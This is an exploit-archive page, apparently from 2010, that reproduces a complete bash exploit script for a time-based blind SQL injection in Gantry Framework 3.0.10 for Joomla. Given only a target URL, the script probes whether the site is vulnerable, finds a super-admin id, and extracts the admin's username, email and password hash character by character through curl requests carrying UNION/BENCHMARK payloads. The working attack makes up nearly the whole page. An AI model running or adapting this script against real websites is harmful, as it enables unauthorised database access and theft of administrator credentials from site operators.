Home / os / win7

Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit

Posted on 06 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================ Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit ============================================================ #!/bin/bash # Exploit Title: Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit # Date: 4 September 2010 # Author: jdc # Software Link: http://www.gantry-framework.org # Version: 3.0.10 # Patched: 3.0.11 if [ &quot;$1&quot; == &quot;&quot; ] then echo &quot;$0 usage: $0 url [debug]&quot; echo &quot;&quot; exit 1 fi clear echo &quot;##############################################################&quot; echo &quot;## Gantry Framework 3.0.10 Blind SQL Injection Exploit ##&quot; echo &quot;##############################################################&quot; echo &quot;&quot; echo &quot; Probing target $1 ...&quot; echo &quot;&quot; GANTRY_PATH=&quot;$1/index.php&quot; GANTRY_TIMEOUT=&quot;5&quot; GANTRY_DELAY=&quot;10&quot; GANTRY_AGENT='Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)' GANTRY_DATA=&quot;option=com_gantry&amp;tmpl=gantry-ajax&amp;model=module&amp;moduleid=&quot; GANTRY_BENCHMARK=&quot;10000000&quot; GANTRY_ADMIN_ID=&quot;&quot; GANTRY_OUTPUT=&quot;&quot; GANTRY_EXPLOIT=&quot;-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16&quot; GANTRY_TEST=`curl -s -A &quot;$GANTRY_AGENT&quot; -d &quot;$GANTRY_DATA$GANTRY_EXPLOIT&quot; &quot;$GANTRY_PATH&quot;` GANTRY_REQUESTS=&quot;1&quot; if [ &quot;Direct access not allowed.&quot; != &quot;$GANTRY_TEST&quot; ] then echo $GANTRY_TEST echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;!! Site not vulnerable. Bailing! !!&quot; echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;&quot; echo &quot;$GANTRY_REQUESTS requests&quot; echo &quot;&quot; exit 1 fi echo -n &quot; Trying to get a super admin id... &quot; for N in `seq 62 9999` do GANTRY_EXPLOIT=&quot;-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$N),BENCHMARK($GANTRY_BENCHMARK,MD5(1)),16)&quot; GANTRY_TIME=&quot;`curl -s -A &quot;$GANTRY_AGENT&quot; -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d &quot;$GANTRY_DATA$GANTRY_EXPLOIT&quot; $GANTRY_PATH`&quot; GANTRY_REQUESTS=`echo &quot;$GANTRY_REQUESTS + 1&quot; | bc` if [ &quot;&quot; != &quot;$2&quot; ] then printf &quot;$N&quot; echo &quot; $GANTRY_TIME&quot; fi if [ `echo &quot;$GANTRY_TIME &gt; $GANTRY_TIMEOUT&quot; | bc` == 1 ] then GANTRY_ADMIN_ID=&quot;$N&quot; break fi sleep $GANTRY_DELAY done if [ &quot;&quot; == $GANTRY_ADMIN_ID ] then echo &quot;FAILED!&quot; echo &quot;&quot; echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;!! Injection FAILED! !!&quot; echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;&quot; echo &quot;$GANTRY_REQUESTS requests&quot; echo &quot;&quot; exit 1 fi echo $GANTRY_ADMIN_ID echo &quot; Fetching admin info (this WILL take a while)... &quot; echo &quot;&quot; echo -n &quot; &gt; &quot; for I in `seq 1 250` do GANTRY_LENGTH=`echo &quot;$GANTRY_OUTPUT&quot; | wc -c` GANTRY_CONTINUE=0 #a,d,m,i,n,b-c,e-h,j-l,o-z,A-Z,0-9,special chars for J in `seq 97 97;seq 100 100;seq 109 109;seq 105 105;seq 110 110;seq 98 99;seq 101 104;seq 106 108;seq 111 122;seq 65 90;seq 48 57;seq 32 47;seq 58 64;seq 91 96;seq 123 126` do if [ 1 == $GANTRY_CONTINUE ] then continue fi sleep $GANTRY_DELAY GANTRY_EXPLOIT=&quot;-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$GANTRY_ADMIN_ID%20AND%20ASCII(SUBSTRING(CONCAT(username,0x3a,email,0x3a,password),$I,1))=$J),BENCHMARK(10000000,MD5(1)),16)&quot; GANTRY_TIME=&quot;`curl -s -A &quot;$GANTRY_AGENT&quot; -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d &quot;$GANTRY_DATA$GANTRY_EXPLOIT&quot; $GANTRY_PATH`&quot; GANTRY_REQUESTS=`echo &quot;$GANTRY_REQUESTS + 1&quot; | bc` if [ &quot;&quot; != &quot;$2&quot; ] then printf &quot;x$(printf %x $J)&quot; echo &quot; $GANTRY_TIME&quot; fi if [ `echo &quot;$GANTRY_TIME &gt; $GANTRY_TIMEOUT&quot; | bc` == 1 ] then LETTER=`printf &quot;x$(printf %x $J)&quot;` GANTRY_OUTPUT=&quot;$GANTRY_OUTPUT$LETTER&quot; GANTRY_CONTINUE=1 if [ &quot;&quot; == &quot;$2&quot; ] then echo -n &quot;$LETTER&quot; fi fi done GANTRY_LENGTH2=`echo &quot;$GANTRY_OUTPUT&quot; | wc -c` if [ &quot;$GANTRY_LENGTH&quot; == &quot;$GANTRY_LENGTH2&quot; ] then break fi done echo &quot;&quot; if [ &quot;$GANTRY_OUTPUT&quot; == &quot;&quot; ] then echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;!! Injection FAILED! !!&quot; echo &quot;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&quot; echo &quot;&quot; echo &quot;$GANTRY_REQUESTS requests&quot; echo &quot;&quot; exit 1 fi echo &quot;&quot; echo &quot;$GANTRY_OUTPUT&quot; echo &quot;&quot; echo &quot;$GANTRY_REQUESTS requests&quot; echo &quot;&quot; exit 0 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP